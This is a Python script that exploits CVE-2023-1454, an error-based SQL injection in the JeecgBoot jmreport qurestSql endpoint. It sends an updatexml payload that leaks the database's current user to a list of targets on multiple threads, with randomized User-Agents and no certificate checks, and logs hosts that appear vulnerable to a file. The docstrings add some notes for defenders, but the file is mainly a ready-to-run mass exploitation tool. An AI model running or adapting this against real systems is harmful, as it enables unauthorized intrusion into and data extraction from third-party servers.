CVE-2023-1454.py
import logging
import concurrent.futures
import requests
import sys
import urllib3
from argparse import ArgumentParser
from urllib import parse
from time import time
import re
import random
# check_url() sends its request with verify=False, i.e. without validating the
# server certificate; this call only silences the warning urllib3 would emit
# for that, it does not change the TLS behaviour itself.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Platform tokens get_ua() chooses from when composing a User-Agent string.
OS_TYPE = [
    '(Windows NT 6.1; WOW64)',
    '(Windows NT 10.0; WOW64)',
    '(Macintosh; Intel Mac OS X 10_12_6)',
]

# Substrings that must ALL be present in an HTTP 200 response body before
# check_url() reports a host. This is a plain substring heuristic, so a hit is
# an indicator to confirm, not proof.
VULN_KEYWORDS = [
    'success":false',
    "XPATH",
    "select",
]

# Loopback proxy endpoints. Not referenced by any code shown in this file, so
# requests are sent directly rather than through a proxy.
PROXIES = {
    'http': 'http://127.0.0.1:8080',
    'https': 'https://127.0.0.1:8080',
}

# Module logger writing to the stream handler's default stream. Both the logger
# and the handler are at INFO, so the LOGGER.debug() "has no issue" lines from
# check_url() are not printed.
LOGGER = logging.getLogger(__name__)
LOGGER.setLevel(logging.INFO)
FORMATTER = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s')
SH = logging.StreamHandler()
SH.setFormatter(FORMATTER)
SH.setLevel(logging.INFO)
LOGGER.addHandler(SH)
def get_ua():
    """Return a randomized desktop-Chrome User-Agent string.

    The Chrome major version is drawn from 55-62, the build and patch numbers
    from 0-3200 and 0-140, and the platform token from ``OS_TYPE``. The
    resulting value is sent as the ``User-Agent`` header by ``check_url``.
    """
    # The draw order (major, build, patch, platform) is kept fixed so a seeded
    # RNG yields the same string as before.
    major = random.randint(55, 62)
    build = random.randint(0, 3200)
    patch = random.randint(0, 140)
    platform_token = random.choice(OS_TYPE)
    template = (
        'Mozilla/5.0 {} AppleWebKit/537.36 (KHTML, like Gecko) '
        'Chrome/{}.0.{}.{} Safari/537.36'
    )
    return template.format(platform_token, major, build, patch)
def check_url(url):
    """Send the fixed probe to one host and report whether the response matches.

    Only the scheme and network location of *url* are used; any path, query or
    fragment is discarded and the request always goes to
    ``/jeecg-boot/jmreport/qurestSql`` on that origin.

    Returns:
        The probed endpoint URL (not the caller's input) when the response is
        HTTP 200 and contains every entry of ``VULN_KEYWORDS``; ``None`` for a
        non-matching response or any request error. Errors raised inside the
        ``try`` block are logged and swallowed.

    Notes for reviewers and defenders:
        * The match is a substring heuristic on the response body. A positive
          should be confirmed against the application's patch level; a negative
          does not show the endpoint is safe (presumably a filtering layer or a
          different database error format would also produce ``None``).
        * The request is a POST to the ``qurestSql`` path with ``updatexml(`` in
          the JSON ``id`` field, which is the pattern to look for in web-server
          or WAF logs when checking whether a host has been probed.
        * ``verify=False`` means the server certificate is not validated, so the
          identity of the responder is not checked.
    """
    parts = parse.urlparse(url)
    origin = '{}://{}'.format(parts[0], parts[1])
    endpoint = "{}/jeecg-boot/jmreport/qurestSql".format(origin)
    request_headers = {
        'User-Agent': get_ua(),
        'Content-Type': 'application/json;charset=UTF-8'
    }
    # Fixed request body shipped with this script, sent verbatim: the '%'
    # characters are literal (no string formatting is applied) and the newline
    # between the two JSON members is part of the payload.
    body = '''{"apiSelectId":"1290104038414721025",
"id":"1' or '%1%' like (updatexml(0x3a,concat(1,(select current_user)),1)) or '%%' like '"}'''
    try:
        # Redirects are not followed, and the 5 s timeout bounds each worker.
        res = requests.post(
            endpoint,
            verify=False,
            allow_redirects=False,
            headers=request_headers,
            data=body,
            timeout=5,
        )
        # res.text is only read when the status is 200 (short-circuit).
        matched = res.status_code == 200 and all(
            keyword in res.text for keyword in VULN_KEYWORDS
        )
        if not matched:
            LOGGER.debug("[-]{} has no issue.".format(endpoint))
            return None
        LOGGER.info("[+]{} is Vulnerable!".format(endpoint))
        return endpoint
    except requests.exceptions.RequestException as e:
        # Connection, timeout, TLS and malformed-URL errors from requests.
        LOGGER.warning("[!]{} request failed: {}".format(endpoint, e))
        return None
    except Exception as ex:
        # Catch-all so one bad target never aborts the worker pool.
        LOGGER.error("[!]{} Exception occurred: {}".format(endpoint, ex))
        return None
def process_results(result):
    """Append a positive result to ``vuln.txt`` in the current directory.

    ``None`` (no finding) is ignored. The file is opened in append mode, so
    findings from earlier runs are kept and one line is added per result.
    """
    if result is None:
        return
    with open("vuln.txt", "a+") as out:
        out.write(result + "\n")
def multithreading(url_list, threads=5):
    """Run ``check_url`` over *url_list* on a thread pool and record the hits.

    Args:
        url_list: Iterable of target URLs, one ``check_url`` call each.
        threads: Maximum number of worker threads (default 5).

    Results are handed to ``process_results`` from the calling thread in
    completion order, so the output file is only written by one thread.
    """
    with concurrent.futures.ThreadPoolExecutor(max_workers=threads) as pool:
        pending = [pool.submit(check_url, target) for target in url_list]
        for finished in concurrent.futures.as_completed(pending):
            process_results(finished.result())
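if __name__ == '__main__':
    # Command-line entry point: take one URL (-u) or a file of URLs (-f),
    # check each target, and log the elapsed time.
    arg = ArgumentParser(description='check_vulnerabilities By J2')
    # Exactly one input source is required. Previously, passing both options
    # or neither left the target list empty and the run reported completion
    # without checking anything.
    source = arg.add_mutually_exclusive_group(required=True)
    source.add_argument("-u", "--url", help="Target URL; Example:http://ip:port")
    source.add_argument("-f", "--file",
                        help="File with one target URL per line; Example:url.txt")
    args = arg.parse_args()
    url = args.url
    filename = args.file
    if url is not None:
        url_list = [url]
    else:
        with open(filename, "r") as f:
            # Skip blank lines so they do not become empty targets that only
            # produce a "request failed" warning.
            url_list = [line.strip() for line in f if line.strip()]
    # Log text: "[+]Task started....."
    LOGGER.info("[+]任务开始.....")
    start = time()
    multithreading(url_list)
    end = time()
    # Log text: "Task finished, took %d s." (%d truncates the float duration)
    LOGGER.info('任务完成,用时%ds.' % (end - start))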